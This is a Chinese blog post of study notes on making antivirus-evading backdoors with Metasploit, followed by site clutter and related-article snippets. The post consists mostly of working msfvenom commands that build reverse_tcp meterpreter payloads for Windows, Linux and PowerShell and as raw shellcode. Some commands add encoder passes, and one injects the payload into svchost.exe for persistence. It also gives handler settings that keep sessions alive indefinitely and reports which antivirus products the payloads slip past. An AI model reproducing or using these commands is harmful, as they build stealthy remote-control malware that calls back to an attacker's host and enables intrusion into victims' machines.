免杀马学习(MSF二进制混淆加密)

最新推荐文章于 2023-09-02 10:44:01 发布
最新推荐文章于 2023-09-02 10:44:01 发布
阅读量408 收藏 2
点赞数
分类专栏: 免杀学习与对抗 文章标签: 学习 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47533648/article/details/128841774
版权

2023年将会持续于B站、CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。

前言

仅供学习,入行前的笔记,关于免杀效果请勿喷

注意的监听参数

防止假session:
在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。
msf exploit(multi/handler) > set ExitOnSession false   //可以在接收到seesion后继续监听端口,保持侦听。

防止session意外退出:
msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0  //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 //默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

handler后台持续监听:
msf exploit(multi/handler) > exploit -j –z
使用exploit -j -z可在后台持续监听,-j为后台任务,-z为成功后不主动发送stage(感谢Green-m大佬指正),使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。
还有种比较快捷的建立监听的方式,在msf下直接执行:
msf5 > handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp

payload的可持续化

一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。
其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o  shell.exe

绕过操作:use exploit/multi/handler(二进制混淆加密)

Windows:

1.msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=<kali port> -a x86 --platform Windows -f exe > shell.exe
2.msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=<kali port> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

Shellcode

基于Linux的Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f c
基于Windows的Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f c

免杀情况:
在这里插入图片描述
在这里插入图片描述

总结

免杀率约15%,过:baidu、kingsoft、alibaba、webroot、panda等已报废杀软。

Cllmsy_K
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MSF的使用教程
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
Msfvenom使用指南
m0_57221101的博客
02-08 6026
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
Msfvenom编码免杀技术实现免杀实战
weixin_43062666的博客
07-10 2862
免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木载荷可以绕开国内所使用的大多数杀毒软件,包括但不限于火绒,腾讯,百度,金山,virustotal沙箱查杀率12,简单但实用...
一种linux平台下算法库二进制文件加密方法探讨
fanliyu的专栏
08-20 1976
最近做项目遇到一个需求,需要把我们的图像算法库提供给客户使用,为防止算法库被对方滥用和逆向破解,需要对算法库二进制文件做加密处理以及加密狗绑定,同时防止库文件被反调试跟踪。算法库加密可以借助开源软件 openssl实现,加密狗的使用也很简单,从加密狗官方渠道即可拿到arm平台下的支持库和简单的示例程序。接下来就是如何构建对二进制库文件的加解密以及如何安全的映射至进程地址空间中,一个最容易想到的思路是对算法库文件套上一层外壳,由外壳程序完成算法库的自动解密以及完全脱离文件系统的进程内存映射,整...
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
一只php免杀.php
10-30
最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒
webshell-venom-master一些免杀
04-13
webshell-venom-master一些免杀,各种语言
DuckMemoryScan:检测绝大部分所谓的内存免杀
03-04
DuckMemoryScan一个简单寻找包括不限于iis劫持,无文件木,shellcode免杀后门的工具,由huoji花了1天编写,编写时间2021-02-24 !!!!!!!!!!!!!!!!!!!!!!!!! ,不要执行32位编译!!! !!!...
智能安全实验室-杀(Defendio)是免费软件
10-29
智能安全实验室-杀(Defendio)是免费软件
009绝密文件加密工具软件
04-07
本软件的作用:加密指定文件夹下的重要文件(如文档、源码、图像等),加密后,即便硬盘或U盘被盗去,文件的内容也不会泄密。解密后文件还原,即可正常操作文件,只加密一次后,以后的加密均为一键完成,操作便捷。 ...
如何使用C 加密攻击载荷来绕过杀毒软件
linjingyg的博客
01-24 353
  一、前言   曾经有人问过我,如何绕过所有的杀毒软件?   我的回答是:非常简单。但这是一种秘密技术,大多数渗透测试者或黑客永远都不会与他人共享。他们与我一样有各种各样的理由,但最大的原因在于,一旦技术公开,杀软公司很快就会检测并封杀这种技术。在本文中,我想跟大家分享一种C#编程及加密方法,可以绕过所有杀软。   在介绍具体细节之前,我想先提供一下本文用到的C#源代码。   github/DamonMohammadbagher/NativePayloadReversetcp   如果你...
MSF初学
h0ld1rs的博客
08-10 315
文章目录技术功能模块exploits(布局)payload(正面战场)auxiliary(侦察兵)encoders(伪装)nops(buff)使用msfconsoleconnectsearchuseshoweditcheck 今天开始学习MSF,查阅了一些资料可以知道,这是一个很强大的渗透工具 大家可以打开kali’,直接在命令行窗口输入msfconsole,然后回车。这样就打开了msfconsoleMsfconsole的系统文件和用户文件位于/usr/share/metasploit-framewor
渗透工具——kali中msf(后门生成模块msfvenom)
最新发布
2301_78006725的博客
09-02 666
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木时,木会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 640
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
msfvenom——木免杀
tomyyyyy
08-24 2803
msfvenom——木免杀篇 目录msfvenom——木免杀篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
msfvenom常见的使用命令
路baby的博客
06-24 2605
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木程序,并在目标机上执行,在本地监听上线...
MSF(3)——apk和exe的加(过360、火绒)
realmels的博客
08-07 6444
apk和exe加免杀的方法
msf免杀
Xor0ne
03-12 1494
1、专业术语 渗透攻击(Exploit) 攻击载荷(Payload) Shellcode 模块(Module) 监听器(Listener) 2、msfvenom生成攻击载荷 msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。 参考链接:https://www.jianshu.com/p/204874fea1d3 Op...
远控免杀专题文章(3)-msf免杀(VT免杀率35/69)
gclome的博客
03-14 431
原文链接:远控免杀专题文章(3)-msf免杀(VT免杀率35/69) 免杀能力一览表 几点说明: 1、上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msfwindows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指...
Ghost RAT DarkComet PoisonIvy NetWire BlackShades njRAT XtremeRAT NanoCore RAT Quasar RAT AsyncRAT这些免杀的代码举例说明介绍
05-18
这些都是远程访问工具(Remote Access Tool,RAT),也称为远控或后门,它们的设计初衷是用于合法的远程管理和支持,但是黑客和攻击者也可以使用它们来远程控制受害者的计算机。 这些 RAT 工具的共同特点是它们都可以在被感染的计算机上运行,并在不被察觉的情况下监控和控制被感染的计算机。这些 RAT 工具广泛应用于网络犯罪和间谍活动中。 这些 RAT 工具的免杀能力通常是通过以下方式实现的: 1. 使用加壳技术:这些 RAT 工具经常使用加壳技术来隐藏其真实性质,使其在被杀毒软件扫描时难以识别。 2. 使用虚拟化技术:这些 RAT 工具可以使用虚拟化技术来创建虚拟环境,使其在被杀毒软件扫描时无法被检测。 3. 使用反调试技术:这些 RAT 工具通常会使用反调试技术来防止被调试器拦截,使其在被分析时更加困难。 总之,这些 RAT 工具的使用给网络安全带来了巨大的威胁,我们需要始终保持警惕,加强网络安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值